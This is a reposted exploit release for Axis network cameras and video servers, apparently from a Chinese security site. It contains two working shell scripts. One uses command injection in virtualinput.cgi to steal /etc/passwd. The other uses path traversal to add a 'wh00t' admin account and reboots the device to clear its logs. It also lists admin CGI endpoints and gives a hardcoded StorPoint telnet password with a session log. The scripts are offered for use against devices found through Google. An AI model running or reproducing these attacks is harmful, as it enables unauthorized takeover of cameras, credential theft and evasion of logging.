信息来源:hk20.com
复制内容到剪贴板
代码:
Vulnerable: Axis 2100/2110/2120/2420/2130 Network Camera, 2400/2401 Video Server.
Included files (some is simple shell scripts):
axis-passwd.sh ........... Get /etc/passwd as 'anonymous viewer' v2.34/2.40
axis-wh00t.sh ............ Add admin account as 'anonymous viewer' v2.12-2.40 (whoops!)
axis-cgi.txt ............. [bonus] Not so mutch bugs here, but nice to know ;)
axis-storpoint-cd-E100.txt [bonus] Hardcoded l/p in Storepoint CD servers
----[ axis-passwd.sh ]----
#!/bin/sh
#
# Get /etc/passwd from:
# Axis 2100/2110/2120/2420 Network Camera 2.34/2.40
# AXIS 2130 PTZ Network Camera
# AXIS 2400/2401 Video Server
# (There may be more devices vulnerable)
#
# Problem:
# PARAMETER=`echo $QUERY_STRING | sed 's/(^.*)=.*$/1/'`
# in 'virtualinput.cgi'
#
# Bug found and code by bashis <mcw+at+wcd.se> 2004-08
# Greets: #hack.se @EFnet
#
# FAQ:
# Q: Where is the cam's?
# A: Google is your friend.
#
if [ ${#*} -ne 2 ]
then
printf "nUsage: %s <ip> <port>nn" $0
exit 1
fi
#
printf "+++ Sending request to %s:%dn+++ Received:n" $1 $2
printf "GET /axis-cgi/io/virtualinput.cgi?x60cat</etc/passwd>/mnt/flash/etc/httpd/html/passwdx60
HTTP/1.1nn" | nc $1 $2
printf "+++ Yeah, right.. for you maybe, but not for me ;->nn+++ Get the passwd
file nown+++ Received:n"
printf "GET /local/passwd HTTP/1.0nn" | nc $1 $2
printf "n+++ Thats it.. Thanks for using Axis Airlines!n"
----[ axis-wh00t.sh ]----
#!/bin/sh
#
# Add admin account with l/p: wh00t/wh00t
# Axis 2100/2110/2120/2420 Network Camera 2.12-2.40
# AXIS 2130 PTZ Network Camera
# AXIS 2400/2401 Video Server
# (There may be more devices vulnerable)
#
# Problem:
# POST action follows "/../"
#
# Bug found and code by bashis <mcw+at+wcd.se> 2004-08
# Greets: #hack.se @EFnet
#
# 2.12 seems to very buggy version, it add wh00t account,
# but editcgi.cgi seems not to work..
#
# Yes, you can use 'editcgi.cgi' to edit /etc/passwd
# and change/add what you want, or browse around in filesystem.
#
# FAQ:
# Q: Where is the cam's?
# A: Google is your friend.
#
if [ ${#*} -ne 2 ]
then
printf "nUsage: %s <ip> <port>nn" $0
exit 1
fi
#
printf "+++ Sending request to %s:%dn" $1 $2
printf "+++ If all went well, you should see the password file soon...n+++ Received:nn"
printf "POST /cgi-bin/scripts/../../this_server/ServerManager.srv HTTP/1.0nContent-
Length: 250nPragma: no-cachennconf_Security_List=root%%3AADVO%%3A%%3A
wh00t%%3AAD%%3A119104048048116%%3A&users=wh00t&username=wh00t&
password1=wh00t&password2=wh00t&checkAdmin=on&checkDial=on&checkView=on
&servermanager_return_page=%%2Fadmin%%2Fsec_users.shtml&servermanager_do=set_variablesn"
|
nc
$1 $2 > /dev/null
# Note.......^^^^^^^^^^^^^^^^^^^^^^
#
printf "GET /admin-bin/editcgi.cgi?file=/etc/passwd HTTP/1.0nHost: 127.0.0.1nAuthorization:
Basic d2gwMHQ6d2gwMHQ=nn" | nc $1 $2
# it's good to clear logfile, so let us reboot the device now
printf "GET /cgi-bin/admin/restart.cgi HTTP/1.0nAuthorization: Basic d2gwMHQ6d2gwMHQ=nn"
| nc $1 $2 > /dev/null
printf "nn+++ You can edit file(s) and browse around filesystem with:nhttp://$1/admin-
bin/editcgi.cgi?file=n"
printf "+++ Login with wh00t/wh00t (yes, you can edit /etc/passwd)n"
printf "n+++ Thats it.. Thanks for using Axis Airlines!n"
----[ axis-cgi.txt ]----
# Well, not so mutch bugs here, but nice to know.. ;)
#
# From version: 2.12 and newer.
# (All dosn't work with 2.12)
#
List all availible parameters.
> [url]http://<device>/cgi-bin/admin/getparam.cgi[/url]
or
> [url]http://<device>/cgi-bin/admin/getparam.cgi?root.Layout.OwnTitle[/url]
Set one parameter.
> [url]http://<device>/cgi-bin/admin/setparam.cgi?root.Layout.OwnTitle=Lame%20stuff[/url]
# Note, Axis is changing 'cgi-bin' to 'axis-cgi'
#
/cgi-bin/admin/systemlog.cgi (show syslog)
/cgi-bin/admin/serverreport.cgi (use[full|less] reports)
/cgi-bin/admin/restart.cgi (restart device, also good to clear syslog)
/cgi-bin/admin/paramlist.cgi (get some config)
/cgi-bin/admin/getparam.cgi (shown above)
/cgi-bin/admin/setparam.cgi (shown above)
/cgi-bin/admin/factorydefault.cgi (hrmm.. ;)
/admin-bin/editcgi.cgi?file= (browse filesystem, edit any file)
----[ axis-storpoint-cd-E100.txt ]----
# Yeah, old product.. old version.. but.. hardcoded l/p, uhm?
# l: copyright p: mammalambalouie
#
# Note, this hardcoded l/p exist in other products and newer versions
# of software as well, but i have not done so mutch research about this.
$ telnet xxx.xxx.xxx.xxx
Trying xxx.xxx.xxx.xxx...
Connected to xxx.xxx.xxx.xxx.
Escape character is '^]'.
AXIS StorPoint CD E100 TELNET CD-ROM Server V5.30 Feb 29 2000
AXIS StorPoint CD E100 network login: copyright
Password: mammalambalouie
AXIS StorPoint CD E100 TELNET CD-ROM Server V5.30 Feb 29 2000
Root>
Root> q
Goodbye!
Connection closed by foreign host.
$ 
